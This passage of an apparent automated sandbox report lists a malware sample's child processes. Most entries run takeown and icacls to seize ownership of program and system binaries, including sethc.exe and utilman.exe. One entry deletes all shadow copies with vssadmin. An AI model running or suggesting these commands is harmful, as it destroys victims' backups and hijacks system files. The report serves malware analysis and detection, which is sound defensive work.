  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sv-SE" /grant Administrators:F
  2⤵
  PID:2592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\cmd.exe" /grant Administrators:F
  2⤵
  PID:4144
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\th-TH" /a
  2⤵
  PID:3324
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\th-TH" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1980
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\tr-TR" /a
  2⤵
  PID:2464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\tr-TR" /grant Administrators:F
  2⤵
  PID:2252
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\uk-UA" /a
  2⤵
  PID:4524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\uk-UA" /grant Administrators:F
  2⤵
  PID:3184
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\zh-CN" /a
  2⤵
  PID:3420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\regedit.exe" /a
  2⤵
  PID:2708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\zh-CN" /grant Administrators:F
  2⤵
  PID:4960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\regedit.exe" /grant Administrators:F
  2⤵
  PID:4908
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\zh-TW" /a
  2⤵
  PID:3676
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\zh-TW" /grant Administrators:F
  2⤵
  PID:1732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo" /a
  2⤵
  PID:1912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo" /grant Administrators:F
  2⤵
  PID:2812
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" /a
  2⤵
  PID:1372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" /grant Administrators:F
  2⤵
  PID:4736
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\reg.exe" /a
  2⤵
  PID:2484
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE" /a
  2⤵
  PID:116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\reg.exe" /grant Administrators:F
  2⤵
  PID:1196
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE" /grant Administrators:F
  2⤵
  PID:2864
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US" /a
  2⤵
  PID:644
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US" /grant Administrators:F
  2⤵
  PID:4900
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2880
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES" /grant Administrators:F
  2⤵
  PID:3820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR" /a
  2⤵
  PID:224
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR" /grant Administrators:F
  2⤵
  PID:2872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskmgr.exe" /a
  2⤵
  - Possible privilege escalation attempt
  PID:2904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT" /a
  2⤵
  PID:3972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:4572
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT" /grant Administrators:F
  2⤵
  PID:2000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP" /a
  2⤵
  PID:3260
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP" /grant Administrators:F
  2⤵
  PID:2384
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA" /a
  2⤵
  PID:3104
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA" /grant Administrators:F
  2⤵
  PID:3668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16" /a
  2⤵
  PID:2228
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\utilman.exe" /a
  2⤵
  PID:2388
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16" /grant Administrators:F
  2⤵
  PID:1980
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\utilman.exe" /grant Administrators:F
  2⤵
  PID:1640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE" /a
  2⤵
  PID:2356
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE" /grant Administrators:F
  2⤵
  PID:4708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller" /a
  2⤵
  PID:3872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller" /grant Administrators:F
  2⤵
  PID:4528
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform" /a
  2⤵
  PID:3020
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform" /grant Administrators:F
  2⤵
  PID:1220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.exe" /a
  2⤵
  PID:4284
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Source Engine" /a
  2⤵
  PID:3156
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.exe" /grant Administrators:F
  2⤵
  PID:2880
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Source Engine" /grant Administrators:F
  2⤵
  PID:8
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE" /a
  2⤵
  PID:432
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE" /grant Administrators:F
  2⤵
  PID:4820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Stationery" /a
  2⤵
  PID:4072
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\perfmon.msc" /a
  2⤵
  PID:4740
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Stationery" /grant Administrators:F
  2⤵
  PID:2524
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\perfmon.msc" /grant Administrators:F
  2⤵
  PID:3332
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\TextConv" /a
  2⤵
  PID:2380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\TextConv" /grant Administrators:F
  2⤵
  PID:4272
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\TextConv\en-US" /a
  2⤵
  PID:2256
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\TextConv\en-US" /grant Administrators:F
  2⤵
  PID:2084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Triedit" /a
  2⤵
  PID:2592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Triedit" /grant Administrators:F
  2⤵
  PID:1936
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\Triedit\en-US" /a
  2⤵
  PID:1980
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\resmon.exe" /a
  2⤵
  PID:2136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\Triedit\en-US" /grant Administrators:F
  2⤵
  PID:532
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\resmon.exe" /grant Administrators:F
  2⤵
  PID:816
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VC" /a
  2⤵
  PID:3656
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VC" /grant Administrators:F
  2⤵
  PID:2336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VGX" /a
  2⤵
  PID:3684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VGX" /grant Administrators:F
  2⤵
  PID:708
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO" /a
  2⤵
  PID:3872
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO" /grant Administrators:F
  2⤵
  PID:116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sethc.exe" /a
  2⤵
  PID:3696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0" /a
  2⤵
  PID:4336
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sethc.exe" /grant Administrators:F
  2⤵
  PID:4120
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0" /grant Administrators:F
  2⤵
  PID:3116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /a
  2⤵
  PID:2308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:2172
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033" /a
  2⤵
  PID:3988
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:1736
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Services" /a
  2⤵
  PID:2156
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Services" /grant Administrators:F
  2⤵
  PID:4164
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\taskkill.exe" /a
  2⤵
  PID:3668
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System" /a
  2⤵
  PID:452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\taskkill.exe" /grant Administrators:F
  2⤵
  PID:4960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3760
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado" /a
  2⤵
  PID:2212
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado" /grant Administrators:F
  2⤵
  PID:4896
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\de-DE" /a
  2⤵
  PID:928
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\de-DE" /grant Administrators:F
  2⤵
  PID:4468
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\en-US" /a
  2⤵
  PID:2232
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\en-US" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\sfc.exe" /a
  2⤵
  PID:2544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\es-ES" /a
  2⤵
  PID:3520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\sfc.exe" /grant Administrators:F
  2⤵
  PID:4528
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\es-ES" /grant Administrators:F
  2⤵
  PID:1220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\fr-FR" /a
  2⤵
  PID:2908
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\fr-FR" /grant Administrators:F
  2⤵
  PID:3156
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\it-IT" /a
  2⤵
  PID:4452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\it-IT" /grant Administrators:F
  2⤵
  PID:3872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\ja-JP" /a
  2⤵
  PID:2136
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\ja-JP" /grant Administrators:F
  2⤵
  PID:3412
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\rundll32.exe" /a
  2⤵
  PID:2216
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\de-DE" /a
  2⤵
  PID:3296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\syswow64\rundll32.exe" /grant Administrators:F
  2⤵
  PID:1556
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\de-DE" /grant Administrators:F
  2⤵
  PID:1804
- C:\windows\system32\vssadmin.exe
  "C:\windows\system32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2000
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\en-US" /a
  2⤵
  PID:5072
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\en-US" /grant Administrators:F
  2⤵
  PID:220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\es-ES" /a
  2⤵
  PID:3912
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\es-ES" /grant Administrators:F
  2⤵
  PID:5092
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\fr-FR" /a
  2⤵
  PID:1144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\fr-FR" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:3784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\it-IT" /a
  2⤵
  PID:4540
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\it-IT" /grant Administrators:F
  2⤵
  PID:744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ja-JP" /a
  2⤵
  PID:3700
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ja-JP" /grant Administrators:F
  2⤵
  PID:2916
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc" /a
  2⤵
  PID:4280
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc" /grant Administrators:F
  2⤵
  PID:3696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\de-DE" /a
  2⤵
  PID:3464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\de-DE" /grant Administrators:F
  2⤵
  PID:1416
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\en-US" /a
  2⤵
  PID:3840
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\en-US" /grant Administrators:F
  2⤵
  PID:2216
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\es-ES" /a
  2⤵
  PID:4896
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\es-ES" /grant Administrators:F
  2⤵
  PID:2524
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\fr-FR" /a
  2⤵
  PID:2708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\fr-FR" /grant Administrators:F
  2⤵
  PID:2580
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\it-IT" /a
  2⤵
  PID:276
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\it-IT" /grant Administrators:F
  2⤵
  PID:2176
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\ja-JP" /a
  2⤵
  PID:3960
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\ja-JP" /grant Administrators:F
  2⤵
  PID:3324
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB" /a
  2⤵
  PID:1640
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB" /grant Administrators:F
  2⤵
  PID:3140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\de-DE" /a
  2⤵
  PID:1196
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\de-DE" /grant Administrators:F
  2⤵
  PID:1328
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\en-US" /a
  2⤵
  - Modifies file permissions
  PID:2928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:744
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\en-US" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:4808
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\es-ES" /a
  2⤵
  PID:3144
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\es-ES" /grant Administrators:F
  2⤵
  PID:3452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\fr-FR" /a
  2⤵
  PID:1080
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\fr-FR" /grant Administrators:F
  2⤵
  PID:3696
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\it-IT" /a
  2⤵
  PID:3156
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\it-IT" /grant Administrators:F
  2⤵
  PID:2232
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\ja-JP" /a
  2⤵
  PID:2592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\ja-JP" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:1628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\uk-UA" /a
  2⤵
  PID:2380
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\uk-UA" /grant Administrators:F
  2⤵
  PID:3180
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad" /a
  2⤵
  PID:2228
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad" /grant Administrators:F
  2⤵
  PID:2236
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad\attachments" /a
  2⤵
  PID:3372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad\attachments" /grant Administrators:F
  2⤵
  PID:4016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Crashpad\reports" /a
  2⤵
  PID:5092
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Crashpad\reports" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet" /a
  2⤵
  PID:4084
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet" /grant Administrators:F
  2⤵
  PID:3876
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\dotnet.exe" /a
  2⤵
  PID:2396
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\dotnet.exe" /grant Administrators:F
  2⤵
  PID:4120
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host" /a
  2⤵
  PID:4544
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host" /grant Administrators:F
  2⤵
  PID:1416
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr" /a
  2⤵
  PID:2624
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr" /grant Administrators:F
  2⤵
  PID:3520
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\6.0.27" /a
  2⤵
  PID:5048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\6.0.27" /grant Administrators:F
  2⤵
  PID:4960
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\7.0.16" /a
  2⤵
  PID:288
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\7.0.16" /grant Administrators:F
  2⤵
  PID:3884
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\host\fxr\8.0.2" /a
  2⤵
  PID:2000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\host\fxr\8.0.2" /grant Administrators:F
  2⤵
  PID:5084
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2232
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared" /a
  2⤵
  PID:2220
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2236
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared" /grant Administrators:F
  2⤵
  PID:3820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App" /a
  2⤵
  PID:3784
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App" /grant Administrators:F
  2⤵
  PID:644
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27" /a
  2⤵
  PID:3192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27" /grant Administrators:F
  2⤵
  PID:2632
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe" /a
  2⤵
  PID:2684
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe" /grant Administrators:F
  2⤵
  PID:2832
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16" /a
  2⤵
  PID:3032
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16" /grant Administrators:F
  2⤵
  PID:336
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe" /a
  2⤵
  PID:3104
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe" /grant Administrators:F
  2⤵
  PID:1040
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2" /a
  2⤵
  PID:300
- C:\windows\system32\icacls.exe
